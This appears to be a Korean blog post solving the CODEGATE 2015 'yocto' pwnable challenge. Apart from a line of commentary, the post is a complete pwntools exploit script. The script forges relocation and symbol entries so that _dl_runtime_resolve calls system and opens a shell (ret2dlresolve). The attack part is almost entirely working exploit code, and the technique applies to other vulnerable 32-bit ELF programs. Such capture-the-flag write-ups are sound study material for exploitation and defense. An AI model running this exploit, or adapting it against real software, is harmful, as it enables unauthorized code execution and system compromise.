Write-up/Pwnable
[CODEGATE 2015] yocto (RTDL)
MyriaBreak
2019. 7. 13. 00:24
codegate의 rtdl 문제
이 포맷을 사용해서 계속해서 풀어나가면 될 것 같다.
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 | from pwn import * elf = ELF('./yocto') # get section address dynsym = elf.get_section_by_name('.dynsym').header['sh_addr'] dynstr = elf.get_section_by_name('.dynstr').header['sh_addr'] relplt = elf.get_section_by_name('.rel.plt').header['sh_addr'] plt_addr = elf.get_section_by_name('.plt').header['sh_addr'] bss = elf.get_section_by_name('.bss').header['sh_addr'] read_got = elf.got['read'] log.info('Section Headers') log.info('.dynsym : ' + hex(dynsym) + " (SYMTAB)") log.info('.dynstr : ' + hex(dynstr) + " (STRTAB)") log.info('.rel.plt : ' + hex(relplt) + " (JMPREL)") log.info('.plt : ' + hex(plt_addr) + " (jmp _dl_runtime_resolve)") log.info('.bss : ' + hex(bss)) log.info('read_got : ' + hex(read_got)) stack_size = 0x300 glob = 0x80495C0 base_stage = bss + stack_size base_stage = glob fake_reloc = base_stage + 24 + 12 fake_sym = fake_reloc + 8 # base_stage + 28 fake_symstr = fake_sym + 16 # "system\x00" address offset fake_cmd = fake_symstr +7 # "/bin/sh\x00" address fake_reloc_offset = fake_reloc - relplt # this value should be able to divide by 16. fake_r_info = ((fake_sym - dynsym) * 16) & ~0xFF #FAKE ELF32_R_SYM, index offset(16 byte index) fake_r_info = fake_r_info | 0x7 #FAKE ELF32_R_TYPE # this value should be able to divide by 16. systemName_index = fake_symstr - dynstr # system_name addr - STRTAB(dynstr) log.info('') log.info('Fake Struct Information') log.info('fake_reloc_offset : ' + hex(fake_reloc_offset)) log.info('fake_cmd : ' + hex(fake_cmd)) log.info('read_got : ' + hex(read_got)) log.info('fake_r_info : ' + hex(fake_r_info)) log.info('systemName_index : ' + hex(systemName_index)) #_dl_runtime_resolve(struct link_map *l, fake_reloc_arg) payload = "." payload += str(fake_reloc_offset) # fake_rel - JMPREL payload += "." payload += str(plt_addr) # jmp _dl_runtime_resolve payload += ";sh;" payload += "A"*(32 - len(payload)) #Argument of the function payload += p32(fake_cmd) # this payload is not use this #Fake Elf32_Rel payload += p32(read_got) # fisrt 4byte : call function got (any function got) payload += p32(fake_r_info) # 1byte relocation type and 3byte FAKE ELF32_R_SYM index offset #Fake Elf32_Sym payload += p32(systemName_index) # elf32_sym(dynstr) index : system_name addr - STRTAB(dynstr) payload += p32(0) payload += p32(0) payload += p8(0) payload += p8(0) # this value must be 0 payload += p16(0x12) #String "system" payload += 'system\x00' #String "/bin/sh" payload += '/bin/sh\x00' conn = process("./yocto") log.info("payload len : " + hex(len(payload))) conn.sendline(payload) conn.interactive() | cs |